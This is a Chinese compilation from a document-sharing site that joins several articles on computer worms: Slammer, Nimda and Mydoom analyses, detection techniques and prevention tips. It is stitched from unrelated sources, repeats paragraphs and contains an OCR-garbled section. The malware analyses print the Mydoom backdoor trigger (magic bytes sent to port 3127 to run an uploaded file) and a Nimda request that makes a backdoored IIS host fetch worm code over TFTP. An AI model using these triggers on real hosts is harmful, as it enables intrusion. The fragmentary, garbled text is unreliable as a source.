蠕虫病毒的特征与防治.doc
蠕虫病毒有什么危害如何杀
蠕虫病毒有什么危害如何杀时间:2013-01-15 19:26来源:作者:xp系统下载点击:170次电脑的蠕虫病毒是什么,会给电脑系统造成什么危害呢?“2003蠕虫王”(Killer2003)感染该蠕虫病毒后网络带宽被大量占用,导致网络瘫痪,该蠕虫是利用SQL SERVER 2000 的解析端口1434的缓冲区溢出漏洞,对其网络进行攻击。
由于“2003蠕虫王”具有极强的传播能力,目前在亚洲、美洲、澳大利亚等地迅速传播,已经造成了全球性的网络灾害。
由于1月25日正值周末,其造成的恶果首先表现为公用互联网络的瘫痪,预计在今后几天继续呈迅速蔓延之势。
小编建议您使用360免费杀毒进行查杀,然后再根据查杀情况进行相应措施。
蠕虫病毒传播过程2003蠕虫病毒是一个极为罕见的具有极其短小病毒体却具有极强传播性的蠕虫病毒。
该蠕虫利用Microsoft SQL Server 2000缓冲区溢出漏洞进行传播,详细传播过程如下:该病毒入侵未受保护的机器后,取得三个Win32 API地址,GetTickCount、socket、sendto,接着病毒使用GetTickCount获得一个随机数,进入一个死循环继续传播。
在该循环中蠕虫使用获得的随机数生成一个随机的ip地址,然后将自身代码发送至1434端口(Microsoft SQL Server开放端口),该蠕虫传播速度极快,其使用广播数据包方式发送自身代码,每次均攻击子网中所有255台可能存在机器。
易受攻击的机器类型为所有安装有Microsoft SQL Server 2000的NT系列服务器,包括WinNT/Win2000/WinXP等。
所幸该蠕虫并未感染或者传播文件形式病毒体,纯粹在内存中进行蔓延。
病毒体内存在字符串“h.dllhel32hkernQhounthickChGet”、“Qh32.dhws2_f”、“etQhsockf”、“toQhsend”。
该病毒利用的安全漏洞于2002年七月被发现并在随后的MS SQL Server2000补丁包中得到修正。
蠕虫病毒
蠕虫病毒1、社会背景最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。
蠕虫病毒是自包含的程序(或是一套程序),它能传播自身功能的拷贝或自身(蠕虫病毒)的某些部分到其他的计算机系统中(通常是经过网络连接)。
近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种,2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。
这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。
2、经济损失3、现象这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。
4、原理它是利用网络进行复制和传播,传染途径是通过网络和电子邮件。
最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。
蠕虫病毒是自包含的程序(或是一套程序),它能传播自身功能的拷贝或自身(蠕虫病毒)的某些部分到其他的计算机系统中(通常是经过网络连接)。
5、传播途径蠕虫一般不采取利用pe格式插入文件的方法,而是复制自身在互联网环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而言,而蠕虫病毒的传染目标是互联网内的所有计算机.局域网条件下的共享文件夹,电子邮件email,网络中的恶意网页,大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。
网络的发展也使得蠕虫病毒可以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使得人们手足无策!凡能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。
所以从这个意义上说,蠕虫也是一种病毒!网络蠕虫病毒,作为对互联网危害严重的一种计算机程序,其破坏力和传染性不容忽视。
与传统的病毒不同,蠕虫病毒以计算机为载体,以网络为攻击对象。
蠕虫病毒的特点与防范技术
蠕虫病毒的特点与防范技术发表时间:2017-03-16T14:06:02.187Z 来源:《科技中国》2016年12期作者:罗昕瑜[导读] 文章针对计算机蠕虫病毒相关问题展开了详细地研究与探讨,阐述了网络安全管理具体途径。
成都树德中学(光华校区) 610091摘要:文章针对计算机蠕虫病毒相关问题展开了详细地研究与探讨,阐述了网络安全管理具体途径,希望为计算机的安全运行提供有价值的依据。
关键词:计算机;蠕虫病毒;防御在科学技术快速发展的背景下,计算机蠕虫病毒在攻击与防御方面也同样有所发展,所以,计算机蠕虫病毒也将具有明显的智能化与复杂化特点,严重影响甚至是危害网络。
为此,必须要采取相应的手段对计算机蠕虫病毒进行防御。
一、计算机蠕虫病毒概述所谓的计算机蠕虫,并不需要由计算机的使用者干预,就能够实现运行的独立性程序,对网络当中的漏洞进行获取,进而掌握计算机部分或者是全部的控制权以实现传播。
而计算机病毒主要是在计算机程序当中插入能够对其功能或者是数据造成严重破坏的指令或程序代码。
由此可见,计算机蠕虫与病毒的传染行以及复制功能十分明显,而在特性方面存在相似性,所以,使得两者区分难度较大。
目前,计算机蠕虫、木马程序以及计算机病毒界限逐渐模糊,且三者之间互相渗透。
其中,更多病毒都对蠕虫技术进行了运用,而同时,蠕虫病毒也采用了病毒与木马技术。
通过上述分析与研究表明,计算机蠕虫病毒集计算机蠕虫、病毒与木马技术为一体,在使用者不干预的情况下就能够运行,并且在扫描过程中获得网络漏洞,进而对计算机控制权予以复制及传播,针对已被感染计算机内部安装后门,亦或是使用恶意代码对计算机的系统与重要信息带来严重破坏。
二、计算机蠕虫病毒的有效防御(一)防火墙技术的运用可以合理地运用网络防火墙软件或者是单机防火墙软件,不允许使用服务器端口以外的端口,这样一来,就能够从根源上切断计算机蠕虫病毒传输与通信的途径。
与此同时,需要针对包含计算机蠕虫病毒特征的报文进行过滤,对已经感染的主机访问保护网络进行及时屏蔽。
蠕虫病毒
虫子悠悠爬——深入了解网络蠕虫作者:小金一、果园里的虫害老皮特坐在电脑前写着邮件,愁眉不展,连敲回车也弄出很大的声响。
“该死的虫子!我用了几种农药也杀不死它们!……它们总是躲着,从这棵树爬到那棵树!这些可恶的蠕虫!现有的农药不管用!你们快点赶过来,带上新的杀虫剂,要快!资金不是问题,重要的是我的果园!看在果实就快要成熟的份上,快点!上帝啊!”原来,老皮特的果园正在经历一场蠕虫危机,他今天和农业虫害防治的人员取得了联系,正在发电子邮件让他们马上过来。
提到蠕虫,大家都不会陌生,这些自然界中的低等生物以农作物为食,给人类带来经济损失,但是,如果我说计算机中也有这样一种名为“蠕虫”的东西存在,同样也给人类带来严重经济损失,你也许会觉得天方夜谭,虫子怎么会爬进计算机呢?可这偏偏就是事实!当然,能爬进计算机的“蠕虫”就不是自然界中那种动物了,它们是一种特殊的程序、一堆具有自我复制能力的代码,它们像蠕虫一样漫无目的乱爬,给计算机带来危害。
1988年11月2日,世界上第一个蠕虫正式诞生。
美国康乃尔大学一年级研究生莫里斯为了求证计算机程序能否在不同的计算机之间自我复制传播,他写了一段试验程序,为了程序能顺利进入另一台计算机,他写了一段破解用户口令的代码。
11月2日早上5点,这段被称为“Worm”(蠕虫)的程序开始了它的旅行(图1),它果然没有辜负莫里斯的期望:它爬进了几千台电脑,让它们死机,直接造成了经济损失9600万美元的记录。
从此,“蠕虫”这个名词传开了,莫里斯也许不知道,他在证明这个结论的同时,也打开了潘多拉魔盒……二、爬进机器的虫子过了一会儿,老皮特收到两封邮件,一封是虫害防治人员的回复,他们说马上就会过来;另一封就有点奇怪,是个陌生的地址发来的,内容更奇怪,只有一行字:Hey,is that your photo?也许是哪个孩子的恶作剧吧,老皮特随手把邮件删除了。
老皮特做梦也不会想到,他用来管理果园的的计算机里已经来了一个不受欢迎的客人……自1988年第一个蠕虫显示出它的威力以来,越来越多的人加入了蠕虫制作阵营,他们用这种途径来证明自己的能力,或者实现一些特殊目的,于是多种多样的蠕虫诞生了,可是不管蠕虫的“行为方式”(它们进入计算机后要做的事情)有多少种,其“传播方式”却仅仅有屈指可数的几种:电子邮件、网页代码、社会工程学、系统漏洞。
蠕虫病毒的分析与防范
蠕虫病毒的分析与防范作者:朱慧爽来源:《科学与财富》2019年第06期摘要:蠕虫病毒给网络环境带来了巨大的灾难。
日益严重的蠕虫问题,不仅给用户造成了巨大的损失,而且严重威胁着国家的信息安全。
蠕虫的检测和防范成为当前网络安全研究的热点。
关键词:蠕虫;病毒;网络安全1.蠕虫病毒简介蠕虫病毒与一般病毒不同。
蠕虫病毒不需要将其自身附着到宿主程序,是一种独立的智能程序。
它利用网络进行传播并能够自我复制,爆发时消耗大量的系统资源,使其他程序运行减慢甚至停止,最后导致系统和网络瘫痪。
“熊猫烧香”就是一个典型的感染型蠕虫病毒,其感染行为主要包括:复制自身到系统目录;创建启动项;在各分区根目录生成病毒副本;修改“显示所有文件和文件夹”设置;尝试关闭注册表编辑器、系统配置实用程序、Windows任务管理器、杀毒软件等。
2.蠕虫的检测技术(1)基于蠕虫特征码的检测技术首先将一些蠕虫恶意代码的特征值收集起来,然后逐个创建每一个特征值的特征码规则库。
检测时,利用在特征码和特征码规则库中的具体规则与要检测的网络行为进行匹配,如果存在异常就会匹配成功,对于这样的异常应当给出警告或者拒绝访问。
这样的检测方式有一定的限制,如果有些蠕虫病毒在规则库中没有匹配成功,就无法检测出蠕虫。
(2)基于蠕虫行为特征的检测技术Bakos提出了一种蠕虫行为特征检测技术,利用了ICMP目标主机不可达报文来判断识辨蠕虫的随机扫描行为,并通过信息收集点来收集网络中由路由器产生的这种不可达报文信息,然后统计消息的个数,并和给定的阈值进行比较,以此判断蠕虫是否有传播行为。
但是这种方法中如果路由器个数较少,那么收集到的报文信息数就会较少,会影响到判断的准确性(3)基于贝叶斯的检测技术在网络传播蠕虫的时候,蠕虫会先向网络中有漏洞的目标主机发送大量连接请求数据包,用这种方法就可以判断出目标主机是否开机,还能判断出这些目标主机是否存在漏洞,由此判断是否会被感染。
3.蠕虫病毒的防范3.1单位用户防范措施(1)提高网络管理员的安全意识和管理水平。
实训7-2蠕虫病毒的查杀与防范.
实训7-2蠕虫病毒的查杀与防范引言蠕虫病毒是一种恶意软件,通过网络传播并感染计算机系统。
蠕虫病毒可以自动复制和传播自己,对网络安全造成严重威胁。
在本文中,我们将介绍蠕虫病毒的特征和传播方式,并提供一些常用的查杀和防范方法。
蠕虫病毒的特征蠕虫病毒与其他恶意软件不同之处在于其具备自我复制和传播的能力。
蠕虫病毒可以通过网络传播,并在感染新主机后再次复制并传播自己。
这种自我复制和传播的能力使得蠕虫病毒具有迅速传播和蔓延的潜力。
另一个蠕虫病毒的特征是其破坏性。
蠕虫病毒可以危害计算机系统的正常功能,并可能导致数据损失、系统崩溃等严重后果。
一些蠕虫病毒还具备隐藏性,可以在感染主机之后长时间潜伏而不被察觉。
蠕虫病毒的传播方式蠕虫病毒可以通过多种方式传播。
以下是一些常见的传播途径:1.电子邮件附件:蠕虫病毒可以通过电子邮件附件传播。
当用户打开蠕虫病毒的电子邮件附件时,病毒将被激活并感染用户的计算机系统。
2.可执行文件:蠕虫病毒可以附加在可执行文件中,当用户运行该可执行文件时,病毒将开始感染用户的计算机系统。
3.共享文件夹:蠕虫病毒可以通过共享文件夹传播。
当用户访问感染的共享文件夹时,病毒将利用网络传播自己到其他计算机系统。
4.操作系统漏洞:蠕虫病毒可以利用操作系统的漏洞来传播自己。
一旦蠕虫病毒感染了具有漏洞的计算机系统,它可以利用该漏洞来感染其他主机和系统。
蠕虫病毒的查杀方法及时发现和查杀蠕虫病毒对于保护计算机系统的安全至关重要。
以下是一些常用的蠕虫病毒查杀方法:1.使用杀毒软件:杀毒软件是查杀蠕虫病毒的最常见和有效的方法之一。
杀毒软件可以及时检测和清除计算机系统中的病毒,并提供实时保护。
2.更新操作系统:定期更新操作系统是防范蠕虫病毒传播的重要措施。
操作系统提供的更新补丁通常包含了对已知漏洞的修复,减少了蠕虫病毒感染的机会。
3.禁用自动运行:蠕虫病毒通常利用自动运行功能来感染计算机系统。
禁用自动运行功能可以阻止蠕虫病毒在用户运行可执行文件时自动启动。
谈网络蠕虫病毒的全面防范
2 网络 蠕 虫 病毒 实例 分 析
目前 , 已经 知 晓 的 产 生 严 重 影 响
比如近 几年危 害很大 的 “ 尼姆达 ”病
毒 就 是 一 种 蠕 虫 病 毒 。 这 一 病 毒 利 用 了微软 W i d ws操作 系统 的漏 洞 , n o 计 算机 感染这 一病毒之 后 ,会不 断地 自动拨 号上 网 ,并利 用文件 中 的地 址 信 息或者 网络共 享进 行传播 ,最终 破 坏 用户 的大 部分 重要数 据 。 蠕 虫是一 种通过 网络 传播 的恶性 病毒 ,它具 有病毒 的一般 特性 ,如 传 播性 、隐蔽 性 、破 坏性 等 ,同时具 有 自己的一些 特征 ,如不 利用文件 寄生 、 对 网络 造成 拒绝服 务 、以及 与黑客技
速 普 及 的今 天 ,蠕 虫病毒 给 用 户造 成 不 少的 损 失 。 该 文主 要 从 企业 和 个 人 两个 角度 阐 述 一 下应 该 如何 做 好 网络 蠕 虫病毒 的 全‘ 面
防范 。
关键 词 :蠕 虫 ;病毒 ;防 范
Di c s t e s u s h Co r h n v Pr e t o of t n t r wo m viu mp e e si e ev n i n he e wo k r r s
t e e wok h n t r wo m vr s r i . u
Ke W ors: wom, vrs pe e t n y d r i , rv n i u o
网络蠕 虫病 毒 可分 为 主 动传 播 (
术相 结合 等。在 产生 的破坏性 上 ,蠕
虫病 毒 也不 是 普 通 病毒 所 能 比拟 的 , 网络 的飞速 发展 ,使 得蠕 虫可 以在短 时间 内蔓延 整个 网络 ,造 成 网络瘫痪 。 根据 被攻 击者 的情况 可 以将蠕 虫
蠕虫病毒的一般处置方案
蠕虫病毒的一般处置方案随着计算机技术的飞速发展,各种病毒也越来越多地出现在我们的互联网世界中。
尤其是蠕虫病毒,由于它的自我复制和传播能力极强,一旦扩散开来,对计算机网络和用户带来的破坏是非常严重的。
为了保护计算机网络和用户的数据安全,我们需要了解蠕虫病毒的一般处置方案。
什么是蠕虫病毒蠕虫病毒是一种利用网络空间进行传播并自我复制的恶意代码,其主要特点是在网络上迅速传播、危害大、范围广。
蠕虫病毒通过利用网络上的漏洞或者弱点进行攻击,从而与其他主机生成新的感染行为,不断扩散,给计算机和网络带来极大的危害。
常见的蠕虫病毒有蠕虫、爆破蠕虫、邮件蠕虫等。
蠕虫病毒的预防与防治注意网络安全作为计算机用户,我们首先应该注意网络安全,并采取一定的预防措施。
可以查看操作系统补丁以及安全更新,并及时安装;安装杀毒软件,并保持及时更新杀毒软件的病毒库文件;禁止使用弱口令以及禁止共享敏感文件;只下载和运行可靠的应用程序;打开和接收电子邮件附件应慎重,不要轻易打开未知来源的附件;使用智能型防火墙来过滤网络流量等等。
这些安全措施可以最大程度地减少蠕虫病毒的传播和危害。
安装杀毒软件杀毒软件是防治计算机中常见恶意代码的重要手段。
我们可以根据操作系统的环境、硬件配置、性能特征选择适合自己的杀毒软件,然后及时更新病毒库文件,保证杀毒软件可以识别新出现的病毒,并及时进行拦截和处置。
及时修补漏洞很多蠕虫病毒利用系统中的软件漏洞进行攻击,在开放端口中搜索额外的受感染目标。
因此,及时修补漏洞是很重要的,可以有效预防蠕虫病毒的感染和扩散。
操作系统或软件提供商会在出现漏洞时发布相应的安全更新,安装修补程序是修补漏洞的主要方式,因此我们需要定期检查漏洞并进行修补。
摆脱蠕虫病毒的方法如果我们的计算机被蠕虫病毒感染,应当及时采取措施进行摆脱。
第一,隔离感染机器,及时关闭网络连接。
在某些情况下需要停止运行与网络有关的程序。
第二,运行杀毒软件,对病毒进行扫描和清除。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
研究生课程论文蠕虫病毒的特征与防治摘要随着网络的发展,以网络传播的蠕虫病毒利用网络全球互联的优势和计算机系统及网络系统安全性上的漏洞,己经成为计算机系统安全的一大的威胁。
采用网络传播的蠕虫病毒与传统的计算机病毒在很多方面都有许多不同的新特点。
本文对蠕虫病毒的特征和防御策略进行了研究,透彻分析了几个流行的蠕虫病毒的本质特征和传播手段,并提出了防治未知病毒以及变形病毒的解决方案与虚拟机相结合的基于攻击行为的着色判决PN机蠕虫检测方法。
关键词: 蠕虫,病毒特征,病毒防治1引言“蠕虫”这个生物学名词于1982年由Xerox PARC的John F. Shoeh等人最早引入计算机领域,并给出了计算机蠕虫的两个最基本的特征:“可以从一台计算机移动到另一台计算机”和“可以自我复制”。
最初,他们编写蠕虫的目的是做分布式计算的模型试验。
1988年Morris蠕虫爆发后,Eugene H. Spafford为了区分蠕虫和病毒,给出了蠕虫的技术角度的定义。
“计算机蠕虫可以独立运行,并能把自身的一个包含所有功能的版本传播到另外的计算机上。
”计算机蠕虫和计算机病毒都具有传染性和复制功能,这两个主要特性上的一致,导致二者之间是非常难区分的。
近年来,越来越多的病毒采取了蠕虫技术来达到其在网络上迅速感染的目的。
因而,“蠕虫”本身只是“计算机病毒”利用的一种技术手段[1]。
2蠕虫病毒的特征及传播1、一般特征:(1)独立个体,单独运行;(2)大部分利用操作系统和应用程序的漏洞主动进行攻击;(3)传播方式多样;(4)造成网络拥塞,消耗系统资源;(5)制作技术与传统的病毒不同,与黑客技术相结合。
2、病毒与蠕虫的区别(l)存在形式上病毒寄生在某个文件上,而蠕虫是作为独立的个体而存在;(2)传染机制方面病毒利用宿主程序的运行,而蠕虫利用系统存在的漏洞;(3)传染目标病毒针对本地文件,而蠕虫针对网络上的其他计算机;(4)防治病毒是将其从宿主文件中删除,而防治蠕虫是为系统打补丁。
3、传播过程:(1)扫描:由蠕虫的扫描功能模块负责探测存在漏洞的主机。
(2)攻击:攻击模块按漏洞攻击步骤自动攻击步骤1中找到的对象,取得该主机的权限(一般为管理员权限),获得一个shell。
(3)现场处理:进入被感染的系统后,要做现场处理工作,现场处理部分工作主要包括隐藏、信息搜集等等(4)复制:复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。
每一个具体的蠕虫在实现这四个部分时会有不同的侧重,有的部分实现的相当复杂,有的部分实现的则相当简略。
尼姆达病毒是一个比较典型的病毒与蠕虫技术相结合的蠕虫病毒,它几乎包括目前所有流行病毒的传播手段,并且可以攻击Win98/NT/2000/XP等所有的Windows操作平台。
该病毒有以下4种传播方式: (1)通过Email发送在客户端看不到的邮件附件程序sample.exe,该部分利用了微软的OE信件浏览器的漏洞;(2)通过网络共享的方式来传染给局域网络上的网络邻居,使用设置密码的共享方式可以有效的防止该病毒的此种传播方式;(3)通过没有补丁的IIS服务器来传播,该传播往往是病毒屡杀不绝的原因,该方式利用了微软IIS的UNICODE漏洞;(4)通过感染普通的文件来传播,在这一点上和普通的病毒程序相同。
4、蠕虫病毒的传播趋势目前的流行病毒越来越表现出以下三种传播趋势:1、通过邮件附件传播病毒,如Mydoom等邮件病毒;2、通过无口令或者弱口令共享传播病毒,如Nimda、Netskey等;3、利用操作系统或者应用系统漏洞传播病毒,如冲击波蠕虫、震荡波蠕虫等。
3目前流行的蠕虫病毒3.1 Mydoom邮件病毒Novarg/Mydoom.a蠕虫是2004年1月28日开始传入我国的一个通过邮件传播的蠕虫。
在全球所造成的直接经济损失至少达400亿美元,是2004年1月份十大病毒之首。
该蠕虫利用欺骗性的邮件主题和内容来诱使用户运行邮件中的附件。
拒绝服务的方式是向网站的WEB服务发送大量GET请求,在传播和攻击过程中,会占用大量系统资源,导致系统运行变慢。
蠕虫还会在系统上留下后门,通过该后门,入侵者可以完全控制被感染的主机[2]。
该蠕虫没有使用特别的技术和系统漏洞,之所以能造成如此大的危害,主要还是由于人们防范意识的薄弱,和蠕虫本身传播速度较快的缘故。
该蠕虫主要通过电子邮件进行传播,它的邮件主题、正文和所带附件的文件名都是随机的,另外它还会利用Kazaa的共享网络来进行传播。
病毒文件的图标和windows系统记事本(NOTEPAD.EXE)图标非常相似,运行后会打开记事本程序,显示一些乱码信息,其实病毒已经开始运行了。
病毒会创建名为“SwebSipcSmtxSO”的排斥体来判断系统是否己经被感染。
蠕虫在系统中寻找所有可能包含邮件地址的文件,包括地址簿文件、各种网页文件等,从中提取邮件地址,作为发送的目标。
病毒会避免包含以下信息的域名:gov、mil、borlan、bsd、example等,病毒同样会避免包含以下信息的电子邮件帐户:accoun、ca、certific、、icrosoft、info、linux等,当病毒检测到邮件地址中含有上述域名或帐户时则忽略该地址,不将其加入到发送地址链表中。
Worm.Mydoom.a病毒主程序流程如图3-1所示,后门程序shimgapi.dll如图3-2所示:图3-1 Mydoom病毒主体流程图图3-2 shimgapi.dll流程图Mydoom蠕虫病毒除造成了网络资源的浪费,阻塞网络,被攻击网站不能提供正常服务外,最大的危险在于安装了后门程序。
该后门即shimgapi.dll,通过修改注册表,使自身随着EXPLORER的启动而运行,将自己加载到了资源管理器的进程空间中。
后门监听3127端口,如果该端口被占用,则递增,但不大于3198。
后门提供了两个功能:(1)作为端口转发代理;(2)作为后门,接收上传程序并执行。
当3127端口收到连接之后,如果recv的第一个字符是x04,转入端口转发流程。
若第二个字符是0x01,则取3、4两个字符作为目标端口,取第5-8四个字节作为目标IP地址,进行连接并和当前socket数据转发。
recv的第一个字符如果是x85,则转入执行命令流程。
先接收四个字节,转成主机字节序后验证是否是x133c9ea2,验证通过则创建临时文件接收数据,接收完毕运行该文件。
也就是说,只要我们把任意一个可执行文件的头部,加上五个字符:x85133c9ea2,作为数据发送到感染了Mydoom.a蠕虫机器的3127端口,这个文件,就会在系统上被执行,从而对被感染系统的安全造成了极大的威胁。
Nimda蠕虫病毒在Nimda蠕虫病毒出现以前,“蠕虫”技术一直是独立发展的。
Nmida病毒第一次将“蠕虫”技术和“计算机病毒”技术结合起来。
从Nimda的攻击方式来看,Nimda蠕虫病毒只攻击微软的Win X系列操作系统,它通过电子邮件、网络临近共享文件、IE浏览器的内嵌MIME类型自动执行漏洞、IIS服务器文件目录遍历漏洞、Code Red II和Sad mind/IIS蠕虫留下的后门共五种方式进行传播,其中前三种方式是病毒传播方式。
关于蠕虫病毒的分析,在很多文献[3]中都有提到,本文在这些文献的基础上,重点针对几种典型的蠕虫病毒在技术实现上的特点进行分析,以期找到他们的一些共性。
1.被利用的系统漏洞描述(1)微软IE异常处理MIME头漏洞IE在处理MIME头中“Content2Type:”处指定的某些类型时存在问题,攻击者可以利用这类缺陷在IE客户端执行任意命令。
(2)Microsoft IIS UniCode解码目录遍历漏洞微软IIS4.0和IIS5.0在UniCdoe字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。
(3)Microsoft IIS CGI文件名错误解码漏洞微软IIS4.0/5.0在处理CGI程序文件名时存在一个安全漏洞,由于错误地对文件名进行了两次解码,攻击者可能利用这个漏洞执行任意系统命令。
(4)“Code Red II”和Sadmind/IIS蠕虫留下的后门程序。
2.传播方式(l)邮件传播蠕虫会向被攻击者发送一封携带了蠕虫附件的邮件。
这个邮件由两部分MIME类型的信息组成:第一部分的MIME类型为“text/html”,但却没有包含文本,因此看起来是空的;第二部分的MIME类型为“a udio/x2wav”,但它实际上携带的是一个名为“Readme.exe”的base64编码的可执行附件。
利用了“微软IE异常处理MIME头漏洞”安全漏洞,任何运行在x86平台下并且使用微软IE5.5SP1或之前版本(IE5.01SP2除外)来显示HTML邮件的邮件客户端软件,都将自动执行邮件附件。
用户甚至只需打开或预览邮件即可使蠕虫被执行[4]。
被蠕虫攻击的目标邮件的地址从下列两个来源中获得:①用户Web Cache文件夹中的*.htm和*.html文件②用户通过MAPI服务收到Email邮件的内容蠕虫在这些文件中搜索看起来像邮件地址的字符串,然后向这些地址发送一份包含蠕虫拷贝的邮件。
Nimda蠕虫在Windows注册表中记录最后一批邮件发送的时间,然后每十天重复搜索邮件地址并重新发送蠕虫邮件。
(2)IIS WEB服务器传播蠕虫会利用两个IIS服务器的目录遍历漏洞和以前的一些IIS蠕虫(Rde CodeII和Sad mind/IIS)留下的后门程序来进行传播。
蠕虫按照下列几率来选择攻击目标的IP地址:①50%的几率,在与本地IP地址前两字节相同的地址(B类网络)中选择一个②25%的几率,在与本地IP地址前一字节相同的地址(A类网络)中选择一个③25%的几率,随机选择IP地址。
蠕虫首先会启动一个TFTP服务器,监听UDP/69端口。
在开启TFTP服务器和确定攻击P1地址之后,Nimda就开始对这个IP地址进行扫描。
首先,扫描“RdeCodeII”留下的后门。
由于被“RedCodeII”攻击过的系统中的Web虚拟目录中会留下一个名为Root.exe的后门程序,Nimda就首先扫描“/Scripts/root.exe”,如果这个程序存在的话,Nimda蠕虫就企图通过它在系统上执行命令。
它执行类似下列命令来向其发送蠕虫代码:GET/scripts/root.exe?/c+tftp+2i+localip+GET+Admin.dll HTTP/1.0其中Localip是本主机的IP地址,这样就通过TFTP协议将本地的Admin.dll文件传播过去,而这个Admin.dll实际上就是蠕虫代码本身,只不过它在这里是以*.dll文件的形式存在。